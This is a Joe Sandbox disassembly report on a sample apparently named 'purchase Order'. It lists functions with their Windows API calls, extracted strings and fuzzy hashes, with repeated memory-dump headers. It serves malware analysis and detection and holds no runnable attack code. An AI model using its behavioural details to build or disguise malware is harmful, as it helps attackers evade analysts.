Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 156618a2ffcbf7dd3a7a303f541ca0473e0717353de0c4ca1b137aa8313db9c6
Instruction ID: c6e32dec3c61f2fbd76b69206c269a9c1adc1f7f7001173081be67932d47da25
Opcode Fuzzy Hash: 156618a2ffcbf7dd3a7a303f541ca0473e0717353de0c4ca1b137aa8313db9c6
Instruction Fuzzy Hash: 7C617C75900209AFDB10DFA4CC82FEEB7B8EB09718F144159FA19E7291D770AA41DB60

Function 00C794E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00C794FE
SafeArrayAllocData.OLEAUT32(?), ref: 00C79549
VariantInit.OLEAUT32(?), ref: 00C7955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C7957B
VariantCopy.OLEAUT32(?,?), ref: 00C795BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C795D2
VariantClear.OLEAUT32(?), ref: 00C795E7
SafeArrayDestroyData.OLEAUT32(?), ref: 00C795F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C795FD
VariantClear.OLEAUT32(?), ref: 00C7960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C7961A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: ec5f9685bc7acc31ac0d61597050cc54b6ac40c7222834afa5b9a30320f3e2a4
Instruction ID: 0f6c4e0a809fbeb0ee865afa6616529a4682485b208487f1c396a55e36fb8999
Opcode Fuzzy Hash: ec5f9685bc7acc31ac0d61597050cc54b6ac40c7222834afa5b9a30320f3e2a4
Instruction Fuzzy Hash: 6C413D35900219AFCB05EFA4D888EDEBBB9FF48355F008065F916A3251DB30EA45DBA1

Function 00C9ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

CoInitialize.OLE32 ref: 00C9ADF6
CoUninitialize.OLE32 ref: 00C9AE01
CoCreateInstance.OLE32(?,00000000,00000017,00CCD8FC,?), ref: 00C9AE61
IIDFromString.OLE32(?,?), ref: 00C9AED4
VariantInit.OLEAUT32(?), ref: 00C9AF6E
VariantClear.OLEAUT32(?), ref: 00C9AFCF

Strings

Failed to create object, xrefs: 00C9AE6C, 00C9AF22
NULL Pointer assignment, xrefs: 00C9AEA6
Invalid parameter, xrefs: 00C9AEED

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 06cd83eb8cbe9efb9cb5df89d3f7c9e3577e0e0bc98f12ee4934c9a88222f2ca
Instruction ID: 27752b34fada0c5505d9f6cc402ee9ad1a2be749645cc1f195b6d001dd8ee79e
Opcode Fuzzy Hash: 06cd83eb8cbe9efb9cb5df89d3f7c9e3577e0e0bc98f12ee4934c9a88222f2ca
Instruction Fuzzy Hash: C2617A71208311AFDB10DF54C848B6EBBE8AF89714F104419F9869B2A1C770EE48CBD7

Function 00C5CB8D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00C5CC15

Part of subcall function 00C5CCCD: GetClientRect.USER32(?,?), ref: 00C5CCF6
Part of subcall function 00C5CCCD: GetWindowRect.USER32(?,?), ref: 00C5CD37
Part of subcall function 00C5CCCD: ScreenToClient.USER32(?,?), ref: 00C5CD5F

GetDC.USER32 ref: 00CBD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CBD14A
SelectObject.GDI32(00000000,00000000), ref: 00CBD158
SelectObject.GDI32(00000000,00000000), ref: 00CBD16D
ReleaseDC.USER32(?,00000000), ref: 00CBD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CBD200

Strings

U, xrefs: 00CBD0D5
@U=u, xrefs: 00CBD14A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: @U=u$U
API String ID: 4009187628-4110099822
Opcode ID: 707729a9df99fe5dec1179557edcc3c5766f54dcf32e0257e4cf257c39919ed8
Instruction ID: c7e2526f12219e264f0c668ec039cdb7d203404253f36e81bf4ae6c74263ca5a
Opcode Fuzzy Hash: 707729a9df99fe5dec1179557edcc3c5766f54dcf32e0257e4cf257c39919ed8
Instruction Fuzzy Hash: 6B710138400205DFCF219F68CC80AEE3BB5FF48325F184269ED665A2A6E7319D85DF60

Function 00C98107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C98168
inet_addr.WSOCK32(?,?,?), ref: 00C981AD
gethostbyname.WSOCK32(?), ref: 00C981B9
IcmpCreateFile.IPHLPAPI ref: 00C981C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C98237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C9824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C982C2
WSACleanup.WSOCK32 ref: 00C982C8

Strings

Ping, xrefs: 00C981EB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 82cae3f16c2445506c63b967821de1ba0222f750d8362c6ebacd3ff3689a20e5
Instruction ID: 021f21d3999686d9146b4f9f4e02e63224627460c519fa79a27b88fa7b206978
Opcode Fuzzy Hash: 82cae3f16c2445506c63b967821de1ba0222f750d8362c6ebacd3ff3689a20e5
Instruction Fuzzy Hash: 0951B2316007019FDB20AF64CC49B2EB7E4FF49720F144969FA66DB2A1DB70E909DB41

Function 00CAECD4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

Part of subcall function 00C5B63C: GetCursorPos.USER32(000000FF), ref: 00C5B64F
Part of subcall function 00C5B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00C5B66C
Part of subcall function 00C5B63C: GetAsyncKeyState.USER32(00000001), ref: 00C5B691
Part of subcall function 00C5B63C: GetAsyncKeyState.USER32(00000002), ref: 00C5B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00CAED3C
ImageList_EndDrag.COMCTL32 ref: 00CAED42
ReleaseCapture.USER32 ref: 00CAED48
SetWindowTextW.USER32(?,00000000), ref: 00CAEDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CAEE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00CAEEDC

Strings

@U=u, xrefs: 00CAEE03
@GUI_DRAGFILE, xrefs: 00CAEE77
@GUI_DROPID, xrefs: 00CAEE33

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
API String ID: 1924731296-2104563098
Opcode ID: 02d2a7a5bf68979478c5d8f45bcc1fd24c1da4abd7cbfdfe0b331c5ceaed8d55
Instruction ID: 6d057cba4b336143c1eba52b8c108f19ed250ecc48fec58f130c2187fd7e9c43
Opcode Fuzzy Hash: 02d2a7a5bf68979478c5d8f45bcc1fd24c1da4abd7cbfdfe0b331c5ceaed8d55
Instruction Fuzzy Hash: 8851BD74504300AFD714EF20CC96F6A77E4FB88704F40492DF996972E2DB719948DBA2

Function 00C8E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C8E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C8E40C
GetLastError.KERNEL32 ref: 00C8E416
SetErrorMode.KERNEL32(00000000,READY), ref: 00C8E483

Strings

INVALID, xrefs: 00C8E455
UNKNOWN, xrefs: 00C8E43B
NOTREADY, xrefs: 00C8E442
READY, xrefs: 00C8E45C
READONLY, xrefs: 00C8E44E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: bb926c90ab9d269e7ee337de14447371703e8b60f1bff043593a769933e67990
Instruction ID: cd694b145d1f0613dc00357cc4afbbd6900317287b516312b25c47f046935722
Opcode Fuzzy Hash: bb926c90ab9d269e7ee337de14447371703e8b60f1bff043593a769933e67990
Instruction Fuzzy Hash: 9F316335A00209AFDB01EBA4C885FBE77B4FF85308F148029E51AA72A1D770DA41D755

Function 00CA8ECC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00CA8EE4
GetDC.USER32(00000000), ref: 00CA8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CA8EF7
ReleaseDC.USER32(00000000,00000000), ref: 00CA8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00CA8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CA8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00CA8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CA8FAA

Strings

@U=u, xrefs: 00CA8F50, 00CA8FAA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID: @U=u
API String ID: 3864802216-2594219639
Opcode ID: 35b7519e34f5df98496712dd171b1d7a861e7792b912c9c09a72e2740593492f
Instruction ID: b1e4c4338eb05b2c7adaeab5c84768c9925c1b26df72a23d0b03f3c73ff651b7
Opcode Fuzzy Hash: 35b7519e34f5df98496712dd171b1d7a861e7792b912c9c09a72e2740593492f
Instruction Fuzzy Hash: 57318E72200214BFEB108F94CC4AFEB3BADEF4A715F044065FE4ADA291CAB59841CB74

Function 00C9B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C9B2D5
CoInitialize.OLE32(00000000), ref: 00C9B302
CoUninitialize.OLE32 ref: 00C9B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 00C9B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C9B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00C9B56D
CoGetObject.OLE32(?,00000000,00CCD91C,?), ref: 00C9B590
SetErrorMode.KERNEL32(00000000), ref: 00C9B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C9B623
VariantClear.OLEAUT32(00CCD91C), ref: 00C9B633

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 91a8ab5e88a05df542fb1bd5f61ee8f1d9356904bd62971df81913be524a5f16
Instruction ID: 1dce07835fbdfc2ace713a471fc97ff300216e473a3d47d5a4ce831780440d14
Opcode Fuzzy Hash: 91a8ab5e88a05df542fb1bd5f61ee8f1d9356904bd62971df81913be524a5f16
Instruction Fuzzy Hash: 44C113B1608301AFCB00DF65D988A2AB7E9FF88704F04492DF58ADB261DB71ED45CB52

Function 00C867E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C867FD
__swprintf.LIBCMT ref: 00C8680A

Part of subcall function 00C6172B: __woutput_l.LIBCMT ref: 00C61784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00C86834
LoadResource.KERNEL32(?,00000000), ref: 00C86840
LockResource.KERNEL32(00000000), ref: 00C8684D
FindResourceW.KERNEL32(?,?,00000003), ref: 00C8686D
LoadResource.KERNEL32(?,00000000), ref: 00C8687F
SizeofResource.KERNEL32(?,00000000), ref: 00C8688E
LockResource.KERNEL32(?), ref: 00C8689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C868F9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 978ca65b7a546352d631956144d7220a14aea470736729c44a7e3ae10ad49267
Instruction ID: 54d2605addea9e302955fabcb67700a82d213ae5a23ec508a3768922eb92c493
Opcode Fuzzy Hash: 978ca65b7a546352d631956144d7220a14aea470736729c44a7e3ae10ad49267
Instruction Fuzzy Hash: 5A3190B190021AABDB11AF61DD45FBF7BA8EF08345F048425F916E6190E730DE11DB74

Function 00C84025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C84047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C830A5,?,00000001), ref: 00C8405B
GetWindowThreadProcessId.USER32(00000000), ref: 00C84062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C830A5,?,00000001), ref: 00C84071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C84083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C830A5,?,00000001), ref: 00C8409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C830A5,?,00000001), ref: 00C840AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C830A5,?,00000001), ref: 00C840F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C830A5,?,00000001), ref: 00C84108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C830A5,?,00000001), ref: 00C84113

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: da6e2fa4e7759d070fe0682d2df05ea2e46b780ad7cfc04f0206fbcfd458ab42
Instruction ID: 27c76277350452ba843f9fc5b4531af621727b70dea6f81954084789080655f3
Opcode Fuzzy Hash: da6e2fa4e7759d070fe0682d2df05ea2e46b780ad7cfc04f0206fbcfd458ab42
Instruction Fuzzy Hash: B031C171500306EFEB14EF55DC89F6EB7ADAB5031AF108015F919E6290CBB49A80CB68

Function 00CB0133 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

GetSystemMetrics.USER32(0000000F), ref: 00CB016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00CB038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CB03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 00CB03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CB03FF
ShowWindow.USER32(00000003,00000000), ref: 00CB0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00CB0440

Strings

@U=u, xrefs: 00CB03AB, 00CB03FF

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID: @U=u
API String ID: 3356174886-2594219639
Opcode ID: 07546f5b0b7617c42a64a8da34f938c13f4a299a03fc802a3292c2226a9485ff
Instruction ID: 7f328ac9cc5227f490aba7d51e421cd7ca208aa0f55d0b5d5a5c0db592b39047
Opcode Fuzzy Hash: 07546f5b0b7617c42a64a8da34f938c13f4a299a03fc802a3292c2226a9485ff
Instruction Fuzzy Hash: F5A18F35600616EFDB18CF68C9897FEBBB1BF44741F248125EC65A72A0D774AE50CB90

Function 00C7CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C7CF50), ref: 00C7CE90

Strings

NAME, xrefs: 00C7CCC2
REGEXPCLASS, xrefs: 00C7CC56
CLASS, xrefs: 00C7CC10
INSTANCE, xrefs: 00C7CD9E
TEXT, xrefs: 00C7CDC7
CLASSNN, xrefs: 00C7CC33

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: dc3ad13a08c3db6f87676050501ebfe0ce4f85316887d5a4c08a1df7821da8e4
Instruction ID: dec3f1b46502cc565f02ee99b6caae129bdf50d0e5e0870330973617040792a0
Opcode Fuzzy Hash: dc3ad13a08c3db6f87676050501ebfe0ce4f85316887d5a4c08a1df7821da8e4
Instruction Fuzzy Hash: 21914E7060060BABCB58DF60C4C2BEAFB75BF14340F54C519E95EA7151DF30AA99DB90

Function 00C43093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C430DC
CoUninitialize.OLE32(?,00000000), ref: 00C43181
UnregisterHotKey.USER32(?), ref: 00C432A9
DestroyWindow.USER32(?), ref: 00CB5079
FreeLibrary.KERNEL32(?), ref: 00CB50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CB5125

Strings

close all, xrefs: 00C430D7

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7f312ae5b567d36f6ca145c605960a0cdc4727c45067b70bc1f8e90646c56f65
Instruction ID: 9f6753c3b7725a3a400154c0f933a5e48f1595fcfd08224d1c463721964056b1
Opcode Fuzzy Hash: 7f312ae5b567d36f6ca145c605960a0cdc4727c45067b70bc1f8e90646c56f65
Instruction Fuzzy Hash: 629139347002428FC719EF24D995FA8F3A4FF54304F5482A9E91AA7262DF30AE5ADF54

Function 00CA9A75 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CA9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00CA9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CA9B47
_wcscat.LIBCMT ref: 00CA9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00CA9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CA9BE7

Strings

@U=u, xrefs: 00CA9B19, 00CA9B2D
SysListView32, xrefs: 00CA9AEB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
